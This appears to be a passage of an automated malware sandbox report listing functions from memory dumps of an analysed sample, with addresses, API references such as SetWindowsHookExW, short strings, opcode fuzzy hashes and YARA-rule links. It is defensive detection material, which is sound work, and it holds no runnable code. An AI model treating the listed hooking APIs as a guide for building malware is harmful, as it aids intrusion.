Instruction Fuzzy Hash: AC718230A142059FCB44EFB4D891AAEB7B6EF85308F558929E517AB395DF30ED01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049FA9D4, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 597COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 58dedfdcf393ad592af15892239462e9655b76d76576c418c88726b4b195245f
Instruction ID: 5cbdc05063722660e20f6fbac14344ac053c7435ac48a1d12a23ce205812043d
Opcode Fuzzy Hash: 58dedfdcf393ad592af15892239462e9655b76d76576c418c88726b4b195245f
Instruction Fuzzy Hash: F3528C34A05219CFCB65DF64CC946ADB7B6BB89305F1088EAC50AAB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FA8A8, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 579COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 2674a2f0d0dc0cec84b00f3be2a5a72458fc51ce95ed3f2fd21ce3fb893d9b25
Instruction ID: 130bdc25ebd018ebe5b9b574f29496295d6afe49078cc8ba0067ebc4290c140d
Opcode Fuzzy Hash: 2674a2f0d0dc0cec84b00f3be2a5a72458fc51ce95ed3f2fd21ce3fb893d9b25
Instruction Fuzzy Hash: 08426D34A05219CFCB65DF64CC946ADB7BABF89305F1088E9C509AB360DB34AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FA8C9, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 579COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: e321e9f6bffb17a06b52992c1ea6e554f115ebccc9fd525f9269d2faffe675a3
Instruction ID: bac1f53628b6b505243409a8bb0260ba42b8649c8fd9809171835ee2e8699861
Opcode Fuzzy Hash: e321e9f6bffb17a06b52992c1ea6e554f115ebccc9fd525f9269d2faffe675a3
Instruction Fuzzy Hash: 44426C34A05219CFCB65DF64CC946ADB7BABF89305F1088E9C509AB360DB34AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FA90E, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 570COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 5813b615e71c89a426ae56fc8204f25b50b9e66995ef9488d4c5d2a5f3d9a41b
Instruction ID: 97f614ca7672a0fedffbd0958f7ea83567dc0ace5b3a5bded19e62ba8ac60f90
Opcode Fuzzy Hash: 5813b615e71c89a426ae56fc8204f25b50b9e66995ef9488d4c5d2a5f3d9a41b
Instruction Fuzzy Hash: 04426C34A05219CFCB65DF64CC946ADB7BABF89305F1088E9C509AB360DB34AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FA94A, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: ea8f65fdd1f7610c0f1a28788f142e92e69210fb88d3a0af16552ca8fd372d5d
Instruction ID: 5574861802b1bfdec6ebe1ef973f9960442d4e14c37036324914ea085622bb5e
Opcode Fuzzy Hash: ea8f65fdd1f7610c0f1a28788f142e92e69210fb88d3a0af16552ca8fd372d5d
Instruction Fuzzy Hash: 11426D34A05219CFCB65DF64CC946ADB7BABF89305F1088E9C509AB360DB34AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FA98F, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 558COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 82beef1751df4c014ae30ff9b7fabeb1cbffd5c7e32f61ab8f15ab31d4ba66f8
Instruction ID: e92ebe3de9a4e259518616e2699cb8c5e639ec0c9c5f7fd865ed573b4958be44
Opcode Fuzzy Hash: 82beef1751df4c014ae30ff9b7fabeb1cbffd5c7e32f61ab8f15ab31d4ba66f8
Instruction Fuzzy Hash: 4F426D34A05219CFCB65DF64CC946ADB7BABF89305F1088E9C509AB364DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FAB2F, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: c7d93fa85b0b86a9e7191be1d21a4b247e1073f46a0df2a6aea55f8543984468
Instruction ID: ab0d2fee241c7f58f7cb518ba07a2c19d3f0c2b26ceeeedf5aef400848cc202c
Opcode Fuzzy Hash: c7d93fa85b0b86a9e7191be1d21a4b247e1073f46a0df2a6aea55f8543984468
Instruction Fuzzy Hash: 7B427E34A04219CFCB65DF64CD947ADB7BABB89305F1088EAC509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FAA60, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 544COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 3460643f20965c943122e1303e03786cfc5bb551e7521d380e5cb445f56beba9
Instruction ID: 2b5d16a4f434a65ae857179a1cc71ffef10fda4d14cdfbeb0da04468b4eec07b
Opcode Fuzzy Hash: 3460643f20965c943122e1303e03786cfc5bb551e7521d380e5cb445f56beba9
Instruction Fuzzy Hash: 7D426D34A05219CFCB65DF64CC946ADB7BABF89305F1088EAC509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FAAA5, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 537COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 9665ba4c9b6d8d48407abd394b72aecbe0dff6708edacfd572269336487ca1a3
Instruction ID: 0dde26540894be1e70d6075f018c54e792392e6a49e956f9f518aff92c74dcac
Opcode Fuzzy Hash: 9665ba4c9b6d8d48407abd394b72aecbe0dff6708edacfd572269336487ca1a3
Instruction Fuzzy Hash: 70326D34A05219CFCB65DF64CC946ADB7BABF89305F1088EAC509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FAAEA, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 530COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 165d5fdcb9aa37ee2921706a8f1c338b8192eb2316b56c3fdf3e9f51949514db
Instruction ID: a2bc37d914b3b977cec6aaf8edd80b380f4ec4e7e06529dd4097742ef0dbb2e7
Opcode Fuzzy Hash: 165d5fdcb9aa37ee2921706a8f1c338b8192eb2316b56c3fdf3e9f51949514db
Instruction Fuzzy Hash: F0326D34A05219CFCB65DF64CC946ADB7BABF89305F1088E9C509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FABB2, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 530COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: 71235cb85cb4463a9a26fb37cf0ae50184d3464c5195dfd69e1754ce5a6e50dc
Instruction ID: 1eb4c898444594fbe9841b33bb3489b14e4dddee55c11a483102602022212696
Opcode Fuzzy Hash: 71235cb85cb4463a9a26fb37cf0ae50184d3464c5195dfd69e1754ce5a6e50dc
Instruction Fuzzy Hash: 24327E34A04219CFCB69DF64CC947ADB7BABB89305F1188E9C509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FAC3E, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 509COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: e0fab736a029cb2a7c9634625abfd9d906418fedacb3fd37c339721b209a75d6
Instruction ID: a13d3aabd9ab1ca62b3337dda687514a9957d23062c45fc07d50ee692fa44b00
Opcode Fuzzy Hash: e0fab736a029cb2a7c9634625abfd9d906418fedacb3fd37c339721b209a75d6
Instruction Fuzzy Hash: 95327E34A04219CFCB69DF64CC947ADB7BABB89305F1188E9C509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FAC83, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 502COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: b39560ea39207f2bc0e3574fa8022ed8bc4535d499b901691db7e41d8431fe1b
Instruction ID: 41d19ccf3f1917732b8135f47b4710d8fd0a1f4e445cf3b734bfa3407e1370b4
Opcode Fuzzy Hash: b39560ea39207f2bc0e3574fa8022ed8bc4535d499b901691db7e41d8431fe1b
Instruction Fuzzy Hash: 38326E34A05219CFCB69DF64CC947ADB7BABB88305F1188E9C509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FACC8, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 495COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: b2d88454bc851263b37d175b0003225549d0cb8bdd8d2f4eda43be05073d30f4
Instruction ID: e042e6d65c839ee0f786a3e1f519f5c7ea84e696eb58a09761e1c50baf2514db
Opcode Fuzzy Hash: b2d88454bc851263b37d175b0003225549d0cb8bdd8d2f4eda43be05073d30f4
Instruction Fuzzy Hash: FB327E34A04219CFCB69DF64CD947ADB7BABB88305F1188E9C509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 049FAD0D, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 488COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 049FAD31

Strings

@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: @!Z
API String ID: 6842923-2298149339
Opcode ID: e8f34b8c79dfec2565619f42a1a4b7b699805f355202dd5d3e0790f3d5c6dde0
Instruction ID: 155d440fdb670bb50d8648caede2586468fd7d8e9b856fdf3efd3b2aa519c917
Opcode Fuzzy Hash: e8f34b8c79dfec2565619f42a1a4b7b699805f355202dd5d3e0790f3d5c6dde0
Instruction Fuzzy Hash: 38227E34A04219CFCB69DF64CD947ADB7BABB88305F1188E9C509AB354DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9D08, Relevance: 2.9, Strings: 2, Instructions: 366COMMON

Download Yara Rule

Strings

00Z, xrefs: 00CA9E69
@QZ, xrefs: 00CAA114

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: 00Z$@QZ
API String ID: 0-872598461
Opcode ID: 77b2b2d6a8408e74dc82ec5847ec0b8e6242f8799d81b4a61d09753734fde103
Instruction ID: b0db07ad00e2017f60ea0cace04df16dfa4dae5c31baac5a1fea1085a4f8501f
Opcode Fuzzy Hash: 77b2b2d6a8408e74dc82ec5847ec0b8e6242f8799d81b4a61d09753734fde103
Instruction Fuzzy Hash: D9C1DF34B042059BDB08DBB9D8517AE72E7EBCA308F148429E60AEB391DF74ED018795

Uniqueness

Uniqueness Score: -1.00%

Function 00CAAD50, Relevance: 2.7, Strings: 2, Instructions: 198COMMON

Download Yara Rule

Strings

ze, xrefs: 00CABCAA
0>, xrefs: 00CAADC5

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: 0>$ze
API String ID: 0-3621287359
Opcode ID: 6cd4872e11df0e822808f5fe63709b832d36d3a7c2188f80449b44e44f571dca
Instruction ID: d3eb5973f78caa86d47934c181e247398d4478e14fd7c47df8eec5906f7fb167
Opcode Fuzzy Hash: 6cd4872e11df0e822808f5fe63709b832d36d3a7c2188f80449b44e44f571dca
Instruction Fuzzy Hash: FE815C74E042598FDB54DF79C880B9EB7B6BF89308F1085AAD109AB355EB309E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CAEA50, Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

p%, xrefs: 00CAEAF4

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: p%
API String ID: 0-983554305
Opcode ID: 503ddec46fce4d2282a71474ed09a42f7ccbc4c2c03de719310a72c659a5d01b
Instruction ID: f093c1545414d2492941e4dcbd4e538f2d8bd2cee3250067fb557a2040b51482
Opcode Fuzzy Hash: 503ddec46fce4d2282a71474ed09a42f7ccbc4c2c03de719310a72c659a5d01b
Instruction Fuzzy Hash: BC31E630F041158BCB48DBB9986429EBAEBABC9728B15843AC106EB384DF34DC0157E5

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA898, Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5161e50afe085e5e26540c609b3444a919c11696dab0920fabe5d85623ecdbd5
Instruction ID: a24e7f1773e0cc5cab6683361f02d629d3377f2732ac312b669a2e9c68bcdb38
Opcode Fuzzy Hash: 5161e50afe085e5e26540c609b3444a919c11696dab0920fabe5d85623ecdbd5
Instruction Fuzzy Hash: 01A1B134B0421A8FDB54DBB5C95065EB7F2AFC6308B258839D51AEF394DB359D01CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00CA36FE, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462a3713977493292ae6cb62d39f90145f766abdf396f10a2739a0a7dbc3e492
Instruction ID: cc2acade63823e462435b25b61f96b083dc1ee3811deeabcb9340b9dc9c9b05a
Opcode Fuzzy Hash: 462a3713977493292ae6cb62d39f90145f766abdf396f10a2739a0a7dbc3e492
Instruction Fuzzy Hash: D651C734B002455FDB14DBA9C861BAFBBA3AFC6308F158464E506AF3C6CF309D428B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6FF8, Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

MZ, xrefs: 00CA7078
LZ, xrefs: 00CA7054

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: LZ$MZ
API String ID: 0-2420956587
Opcode ID: 6b054b9dabcb6fc0920e9e8cb1e15ab038f483e6a15113117aaf88f8092e0400
Instruction ID: ae98d0af307007ef91634ae7eb811b5f16f5d9840b778909a710a3f936e94cdd
Opcode Fuzzy Hash: 6b054b9dabcb6fc0920e9e8cb1e15ab038f483e6a15113117aaf88f8092e0400
Instruction Fuzzy Hash: 2E11FE74D1020DAFCF90FFE5E85559D7BB5FB89305B008979D415A7250EF705A488F50

Uniqueness

Uniqueness Score: -1.00%

Function 00781988, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00781A0B

Memory Dump Source

Source File: 00000005.00000002.2368204811.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 635b33e672fa2045157151217d6740c6826739db2876f40ff10e0858bf196444
Instruction ID: e0cd57e8b91538544cf98e8607f6484855cfc8ea9885756e6b76f60b89f9a7a0
Opcode Fuzzy Hash: 635b33e672fa2045157151217d6740c6826739db2876f40ff10e0858bf196444
Instruction Fuzzy Hash: D2211571D042498FCB14CFA9D844BEEFBF5EB88324F14842AD459B7250C7B8A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00781990, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00781A0B

Memory Dump Source

Source File: 00000005.00000002.2368204811.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 0a1383708e3742d887862bdfae95ea41bba82eae6ad7689614e2a6272821136d
Instruction ID: a978c3ef58ce0144ae7c4d6e7b1fb90432c533039bc5f216560f3c85bdb7c4c1
Opcode Fuzzy Hash: 0a1383708e3742d887862bdfae95ea41bba82eae6ad7689614e2a6272821136d
Instruction Fuzzy Hash: 7521F4B19042499FCB14DFA9D844BEEFBF9FB88314F14842AD459B7250C778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CADC40, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

`F, xrefs: 00CADC97

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: `F
API String ID: 0-1751728661
Opcode ID: 39012305af541935ebed671875710b11ab3efa6f78ddd1cab6a90e1ddf783e2b
Instruction ID: 632dc16be068dbdce81c14da422981ba95a9b514e8f530ae5a331ef7d5298057
Opcode Fuzzy Hash: 39012305af541935ebed671875710b11ab3efa6f78ddd1cab6a90e1ddf783e2b
Instruction Fuzzy Hash: 75119D70E002089FDB40EFF9E490A9EB7F6EB89348F108439E50ADB354DB30AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD2C8, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

`>, xrefs: 00CAD349

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: `>
API String ID: 0-2408559083
Opcode ID: a54482f30481fc403e5517fae0a296420f513645d0d37f1845ebd6ff43c00386
Instruction ID: 74fb859f5d82f7695f4d6a0c528912a04a986bf526472498f551a808d1cd1dca
Opcode Fuzzy Hash: a54482f30481fc403e5517fae0a296420f513645d0d37f1845ebd6ff43c00386
Instruction Fuzzy Hash: 51113974F001198F8F90EBB9D85099EB7F6ABC9218B108539D21AEB354EB34AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CADA90, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

@b, xrefs: 00CADB11

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: @b
API String ID: 0-2714559827
Opcode ID: 5b7af121ca82fc6f2b35b311eee6f8b25e0c6b3d2c9a655cfca0760eef93dd6d
Instruction ID: 9230c0d1ffb90dbf9dea5546b6477239952cfe41d93f7cdec0c4d77a1d087d83
Opcode Fuzzy Hash: 5b7af121ca82fc6f2b35b311eee6f8b25e0c6b3d2c9a655cfca0760eef93dd6d
Instruction Fuzzy Hash: 26113075F001159F8F40EBB9D85099EB7F6ABCD2187108539D21AEB354EE34AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD5D0, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

0U, xrefs: 00CAD60F

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: 0U
API String ID: 0-1698311479
Opcode ID: 690171b4b89debc3a3a0090e5cb26c3efe17c7bb9cc205938d63fba98cef02ca
Instruction ID: 5f8b5d41fc5ebcccbbd4452562ef186dd24d4c866ed85cfb168977d3215021c2
Opcode Fuzzy Hash: 690171b4b89debc3a3a0090e5cb26c3efe17c7bb9cc205938d63fba98cef02ca
Instruction Fuzzy Hash: 0C113974F005198F8F80EBB9D85099FB7F6ABC92187118439E21AEB354EA34AD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD3E0, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

d, xrefs: 00CAD461

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: d
API String ID: 0-3208743413
Opcode ID: ce75ac5ff639eb43c0d56acdbcffa8a55387a40e75757598367204872e68b083
Instruction ID: 5af6921a8597383b8ecc3f2582d8909e62ec991c24cf5167ab877a835e3b5872
Opcode Fuzzy Hash: ce75ac5ff639eb43c0d56acdbcffa8a55387a40e75757598367204872e68b083
Instruction Fuzzy Hash: 68113C74F001198F8F80EBB9D85099EB7F6ABCD2187108539D21AEB354EA34AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD9B8, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

pa, xrefs: 00CAD9F7

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: pa
API String ID: 0-2928300800
Opcode ID: a44b002e315871564c799f2c2ee754c5afd48fa7d00b3e9d9b2421223b9d1e63
Instruction ID: 80957b3f23552578318d9c130df450cf9a7ddf6bedabdb4bf81113a448be8d73
Opcode Fuzzy Hash: a44b002e315871564c799f2c2ee754c5afd48fa7d00b3e9d9b2421223b9d1e63
Instruction Fuzzy Hash: B5115B74F141198F8F80EBB9D84099FB7F6BFC96187108439D21AEB754EE34AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CADB68, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

`U, xrefs: 00CADBE9

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: `U
API String ID: 0-159777671
Opcode ID: a50ee8a01a63b8afb5b65d72144a184633d4fd04d2c59d6ec6d784c7444cf0de
Instruction ID: 01c7d916e342fcecdb771cf97a676956c63927ad73b7b63f53eb96bc6f070ff0
Opcode Fuzzy Hash: a50ee8a01a63b8afb5b65d72144a184633d4fd04d2c59d6ec6d784c7444cf0de
Instruction Fuzzy Hash: 56113C74F005198F8B94FBB9D85099EB7F6ABC9218B108539D21AEB354EB34AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA09ED, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f343eb0e1fffb2beeed5be2b97c50a133cdc66fe5fd2e12f792c682b2bb4d9
Instruction ID: 8c7f99c2b29d65115854b98e5e1516ab51363375075425a5e6973fc1b0f33a08
Opcode Fuzzy Hash: 36f343eb0e1fffb2beeed5be2b97c50a133cdc66fe5fd2e12f792c682b2bb4d9
Instruction Fuzzy Hash: 25310731D14B098EDB50EF68C8405A9F7B1AF96300F51D79AE4987B121EF30AAD0CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002AD4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367983363.00000000002AD000.00000040.00000001.sdmp, Offset: 002AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5119fbb182f6a67f721c2721b6d7c93f29ccedadabe4f557c018ee56b38d3c16
Instruction ID: 054b3dfc0af577221c8ab749f92bdea8c08e2625fb31fcc7f6cd582ebc6bb942
Opcode Fuzzy Hash: 5119fbb182f6a67f721c2721b6d7c93f29ccedadabe4f557c018ee56b38d3c16
Instruction Fuzzy Hash: D2213375910204DFDB11CF54D8C0B26BFA5FB89318F208569E80A0B606C736E826CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3AC0, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0023d618c27429883c13e74ac7f76ff4dc5b5dafed73700a2a6572455abd44e4
Instruction ID: b94bdb3b1ac2cb199447026f79b6027b88955e96fb4e2df780f84c4e44df16bb
Opcode Fuzzy Hash: 0023d618c27429883c13e74ac7f76ff4dc5b5dafed73700a2a6572455abd44e4
Instruction Fuzzy Hash: 0F21E530E05244DFD754DBA8C9A479EFBF6AF8A304F148429E02AEB391CB309D45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367996104.00000000002BD000.00000040.00000001.sdmp, Offset: 002BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b613a9c63f022edd446e0615f181beb0f8405792beab277e27e3e8e4ebd10ea4
Instruction ID: 82ec6b4df938dcc47e1c6d5c27bdc85f6afcb600926aef6cb5e0c56c6a442a12
Opcode Fuzzy Hash: b613a9c63f022edd446e0615f181beb0f8405792beab277e27e3e8e4ebd10ea4
Instruction Fuzzy Hash: B3212275614204DFCB14EF24D884BA6BBA5EB84354F24CDADD8094B246D33AD817CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 002BE674, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367996104.00000000002BD000.00000040.00000001.sdmp, Offset: 002BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79c6d4bfdcc76aacc2f92839533c610e38701871eb655cbda50e95c1ce65cab
Instruction ID: 2982361a2c2cf6e7007e20099657304e83a1600aceca641ec14cc634befd4d2d
Opcode Fuzzy Hash: f79c6d4bfdcc76aacc2f92839533c610e38701871eb655cbda50e95c1ce65cab
Instruction Fuzzy Hash: F8212275610204EFCF04CF60D8C4BA6FBA9FB84354F24C9ADD8094B242C776E866DA62

Uniqueness

Uniqueness Score: -1.00%

